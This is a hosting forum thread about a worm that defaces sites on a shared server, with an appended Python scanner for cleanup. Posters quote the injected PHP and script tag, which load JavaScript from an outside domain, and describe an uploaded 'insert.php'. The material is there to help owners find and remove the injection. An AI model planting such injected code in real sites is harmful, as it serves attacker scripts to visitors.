

Websites hacked/defaced on Server 2





Bondings
It seems like a worm/hacker is currently trying to hack/deface websites on server 2, mostly when directories/files are chmod to 777. Most of the time the following code is added to the files:
Code:
<? if (!defined('domainstat')) { define("domainstat", "ok");  echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=4fe6d'></script>";}?>


If you have problems with your website, get popups or a "header already sent out" error, please look for this code in the source code of the PHP files in question and remove it.

I'm currently trying to change some settings on the server to prevent future attempts, or at least make it harder.

I also disabled register_globals on server 2. register_globals puts variables submitted by users as variables in php as $variable instead of $_POST['variable'] or $_GET['variable']. This is quite insecure and that's why I disabled it now.

If you need it for your website, you need to place the following line in a .htaccess file in the directory in question.
Code:
php_flag register_globals on
wumingsden
The JavaScript code might have also been added to your HTML files. The exact code is the following:

Code:
<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=c55503e1'></script>
Daniel15
Upon investigation by me, it appears that the hacker will try to upload a script called 'insert.php' into your forum's uploads folder, and then either try to run the script, or set the script as their avatar, hoping that someone else will run it.

My suggestion is to update all scripts to the latest versions, and make sure you have secure passwords.
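
An added example, not part of any post in this thread: a Python check a site owner could run over a copy of their web root to find the two injected snippets quoted above, list world-writable (e.g. 777) paths, and spot any `insert.php`. The names `clean`, `scan` and `SAMPLE` are hypothetical, the sample page is constructed, and matching any hex `id` value is an assumption based on the two ids shown in the thread.

```python
import os
import re
import stat

# Patterns built from the two snippets quoted in this thread; the id value varies.
SCRIPT_TAG = (r"<script[^>]*src=['\"]http://domainstat\.net/stat\.php\?id=[0-9a-f]+['\"]"
              r"[^>]*>\s*</script>")
BARE_TAG = re.compile(SCRIPT_TAG, re.I)
PHP_WRAPPER = re.compile(
    r"<\?(?:php)?\s*if\s*\(\s*!defined\('domainstat'\)\s*\)\s*\{.*?"
    + SCRIPT_TAG + r".*?\}\s*\?>", re.I | re.S)
EXTENSIONS = (".php", ".html", ".htm")

# Constructed sample page: the thread's PHP snippet in front of ordinary content.
SAMPLE = ("<? if (!defined('domainstat')) { define(\"domainstat\", \"ok\");  echo \""
          "<script language='JavaScript' type='text/javascript' "
          "src='http://domainstat.net/stat.php?id=4fe6d'></script>\";}?>"
          "<?php echo 'hello'; ?>\n")


def clean(text):
    """Return text with the injected PHP wrapper and any bare script tag removed."""
    return BARE_TAG.sub("", PHP_WRAPPER.sub("", text))


def scan(root):
    """Walk root and report infected files, world-writable paths and insert.php."""
    report = {"infected": [], "world_writable": [], "insert_php": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if not stat.S_ISLNK(mode) and mode & stat.S_IWOTH:
                report["world_writable"].append(path)  # e.g. chmod 777
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name.lower() == "insert.php":
                report["insert_php"].append(path)
            if name.lower().endswith(EXTENSIONS) and os.path.isfile(path):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if BARE_TAG.search(fh.read()):
                        report["infected"].append(path)
    return report


if __name__ == "__main__":
    import sys
    print(scan(sys.argv[1] if len(sys.argv) > 1 else "."))
```

`scan` only reports; review each hit and write back `clean(text)` after taking a backup, since a file the worm could modify may contain other changes as well.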